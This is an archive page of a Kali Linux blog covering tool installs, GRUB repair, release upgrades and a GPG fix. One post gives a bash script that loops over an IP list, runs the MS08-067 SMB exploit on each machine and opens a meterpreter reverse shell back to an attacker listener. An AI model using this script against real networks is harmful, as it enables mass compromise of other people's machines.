Archive | Kali Linux RSS for this section

Automater Tool on Kali Linux

Automater is a URL/Domain, IP Address, and Md5 Hash OSINT tool aimed at making the analysis process easier for intrusion Analysts. Given a target (URL, IP, or HASH) or a file full of targets Automater will return relevant results from sources like the following: IPvoid.com, Robtex.com, Fortiguard.com, unshorten.me, Urlvoid.com, Labs.alienvault.com, ThreatExpert, VxVault, and VirusTotal. 
*Automater is installed on HoneyDrive and Kali by default but currently have an outdated version.

Installation:
Automater comes in two  flavors, python script that will work for Linux or Windows, and an exe for Windows.

Automater Tool on Kali Linux

Automater Tool, Kali Linux, Kali

from iExplo1t http://ift.tt/1uDArWa

Kali Linux Custom ARM Image [ DOWNLOAD LINKS ]


 DOWNLOAD


Kali Linux 1.0.6a Raspberry Pi image ( Download Torrent or Download Image )
Kali Linux 1.0.6 BeagleBone Black image ( Download Torrent or Download Image )
Kali Linux 1.0.6 HP Chromebook image (
 Download Torrent or Download Image ) 
Kali Linux 1.0.6 Cubieboard 2 image (
Download Torrent or Download Image )
Kali Linux 1.0.6 CuBox image ( Download Image or Download Torrent )
Kali Linux 1.0.6 EfikaMX image ( Download Image or Download Torrent )
Kali Linux 1.0.6 Odroid U2 image ( Download Image or Download Torrent )
Kali Linux 1.0.6 Odroid XU image ( Download Image or Download Torrent )
Kali Linux 1.0.6a Samsung Chromebook image ( Download Image or Download Torrent )
Kali Linux 1.0.6 Utilite Pro image ( Download Image or Download Torrent )
Kali Linux 1.0.6 Galaxy Note 10.1 image ( Download Image or Download Torrent )
Kali Linux 1.0.6 SS808 image ( Download Image or Download Torrent )

Kali Linux Custom ARM Image [ DOWNLOAD LINKS ]

Kali Linux

from iExplo1t http://ift.tt/1xBULV5

Kali Linux – Complete Re-install of GRUB from Live (CD/USB)



Hi all
This video tutorial will show you how you can use an Kali LiveCD / USB Drive to reinstall GRUB, even when your boot device is inaccessible, sometimes damaged by windows installations, or other OS’s
You have to know your Kali partition (GPARTED/fdisk -l) and mount it.

Commands used in this video:

mount the linux partition on /mnt

mount /dev/sda1 /mnt

Using the linux installation on your hard drive instead of /dev/sda1

mount (bind) the live CD dir with installed linux dir

mount –bind /dev /mnt/dev
mount –bind /proc /mnt/proc
mount –bind /sys /mnt/sys

Get the root privaleg
chroot /mnt

Install the Grub

grub (Type: TAB Twice)
grub-install /dev/sda ***** Using your boot device instead of /dev/sda

Update the Grub

grub-mkconfig -o boot/grub/grub.cfg

CTRL-D
umount /mnt/dev
umount /mnt/proc
umount /mnt/sys
umount /mnt

reboot



Contact Me : contact@iexplo1t.com

Follow Us
http://ift.tt/1nE0OI1; (Budget Equipment)
http://ift.tt/1l0Q2ui (For Extra Help)
Don’t forget to subscribe as it’s FREE.
http://ift.tt/1mJCaFZ

Kali Linux – Complete Re-install of GRUB from Live (CD/USB)

linux, Kali Linux

from iExplo1t http://ift.tt/1pBEN9g

Kali Linux 1.0.8 — New Release Supports UEFI Boot

Great news for Hackers and Backtrack Linux fans! Offensive Security, the developers of one of the most advance open source operating system for penetration testing known as ‘KALI Linux‘, has finally announced the release of the latest version i.e. Kali Linux 1.0.8.

Kali Linux is based upon Debian Linux distribution designed for digital forensics and penetration testing, including a variety of security/hacking tools. It is developed, maintained and funded by Offensive Securityconstantly providing users with the latest package updates and security fixes available.
The new release supports Extensible Firmware Interface (EFI) boot that allows you to start Kali Linux 1.0.8 using a USB stick on recent hardware, and especially on Apple Macbooks Air and Retina models.

This new feature simplifies getting Kali installed and running on more recent hardware which requires EFI as well as various Apple Macbooks Air and Retina models,” reads the blog post.

Although, this time the developers are not releasing any ARM or VMWare images with its new release, but are providing its users a whole array of tool updates and patches that have accumulated over the past couple of months.

Building on our ever-growing list of such features, we can now happily say that the Kali image is a EFI Bootable ISO Hybrid image that supports Live USB Encrypted Persistence with LUKS Nuke support, out of the box.

If you already have a Kali Linux installed on your system, you don’t need to download the new setup. You can easily upgrade your installation to the latest version of the Kali Linux using the following commands:

root@kali:~# apt-get update
root@kali:~# apt-get dist-upgrade

or you can download complete ISO of KALI Linux 1.0.8 here.

Kali Linux 1.0.8 — New Release Supports UEFI Boot

Kali Linux

from iExplo1t http://ift.tt/1mScSjQ

Kali Linux Password Reset Recovery

Hello Friends
Today I’ll shwo you how to crack Kali Linux Password in simple steps

Kali Linux Password Reset Recovery

Kali Linux

from iExplo1t http://ift.tt/1xFvbk9

Metasploit Framework Github Setup on Kali Linux

Today I show you how to install Metasploit Framework Github on Kali Linux, I did this on my pentesting laptop which runs Kali Linux, but as the framework is written in ‘ruby’ it should follow the same for any distro.

Link 1
http://ift.tt/1x4f8vW
http://ift.tt/1qqucn9
****************************************************
Link 2
http://ift.tt/1x4f6UR
http://ift.tt/1x4f8Mg

Metasploit Framework Github Setup on Kali Linux

Kali Linux, metasploit

from iExplo1t http://ift.tt/1x4f8Mi

Hack Multiple Systems with MSFCLI and Bash Scripting

In this video, I will demonstrate how to simultaneously exploit multiple machines with a common vulnerability using MSFCLI (Metasploit Framework Command Line Interface) and bash scripting. I will perform this demonstration by exploiting three windows machines simultaneously and acquiring a reverse TCP meterpreter shell on each system.




Commands :

#!/bin/bash

i=4444
for ip in $(cat iplist.txt)
do
gnome-terminal -x msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=$ip LHOST=192.168.1.8 LPORT=$i E
echo “Exploiting $ip and establishing reverse connection on local port $i”
i=$(($i+1))
done

Hack Multiple Systems with MSFCLI and Bash Scripting

linux, BackBox, Kali Linux, BackTrack

from iExplo1t http://ift.tt/1onDPCL

How To: Fix the GPG error in updater “NO_PUBKEY”

For who have this problem (NO_PUBKEY)

root@kali = gpg –keyserver pgp.mit.edu –recv-keys THEKEY
root@kali = gpg –armor –export THEKEY | apt-key add –

How To: Fix the GPG error in updater “NO_PUBKEY”

linux, BackBox, Kali Linux, BackTrack, Ubuntu

from iExplo1t http://ift.tt/1odghMF

Kali Linux 1.0.7 Released

 

Kali Linux 1.0.7 Released 
apt-get update
apt-get dist-upgrade
If you have just updated your kernel, then reboot

http://ift.tt/1ti8Ox1

Kali Linux 1.0.7 Released

Kali Linux

from iExplo1t http://ift.tt/1tK9yNE

How To: Install AutoScan Network on Kali Linux

AutoScan-Network is an application designed to explore and to manage your network. Entire subnets can be scanned simultaneously without human intervention. It features OS detection, automatic network discovery, VNC Client, SSH client

http://ift.tt/1n0L3cQ

How To: Install AutoScan Network on Kali Linux

AutoScan, Kali Linux

from iExplo1t http://ift.tt/1jW9Rgq